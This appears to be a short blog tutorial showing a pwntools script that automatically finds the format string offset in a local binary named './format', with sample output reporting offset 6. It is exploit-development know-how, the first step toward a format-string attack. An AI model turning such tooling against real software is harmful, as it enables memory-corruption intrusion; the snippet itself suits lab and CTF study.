With this code you are able to efficiently calculate the offset to an string format vulnerability.

from pwnlib.fmtstr import FmtStr, fmtstr_split, fmtstr_payload
from pwn import *
context.clear(arch = 'amd64')
def send_payload(payload):
        s.sendline(payload)
        r = s.recvline()
        s.recvline()
        return r

s = process('./format')
print(FmtStr(execute_fmt=send_payload).offset)
...
[*] Found format string offset: 6
6
Last modified: July 2, 2021

Author

Comments

Write a Reply or Comment

Your email address will not be published.